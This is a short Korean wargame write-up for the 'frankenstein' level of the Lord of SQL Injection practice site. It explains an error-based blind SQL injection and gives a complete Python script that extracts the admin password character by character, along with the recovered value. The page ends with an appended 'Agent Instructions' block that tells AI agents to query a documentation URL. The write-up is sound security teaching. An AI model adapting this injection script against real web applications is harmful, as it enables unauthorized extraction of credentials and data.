# frankenstein
첫 화면이다.
Error-based Blind SQL Injection 문제로 인지하고 풀었다.
파이썬 코드를 짜면 아래와 같다.
```python
import requests
import string
URL = 'https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = '
error'
def query(payload):
cookies = {'PHPSESSID': PHPSESSID}
r = requests.get(URL + payload, cookies=cookies)
content = r.text
return TRUE_PHRASE in content
# 0dc4efbb
def find_pw():
pw = ''
while True:
found = False
for character in string.printable:
if character in "#%&'_":
continue
elif query("' or case when id='admin' and pw like '{}{}%25' then 9999999999*9999999999 else 0 end%23".format(pw, character)) is True:
pw += character
found = True
break
if found is False:
break
print('pw: {}'.format(pw))
find_pw()
```
실행결과, pw는 `0dc4efbb` 이다.
에 접속하면 문제가 풀린다.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/frankenstein.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.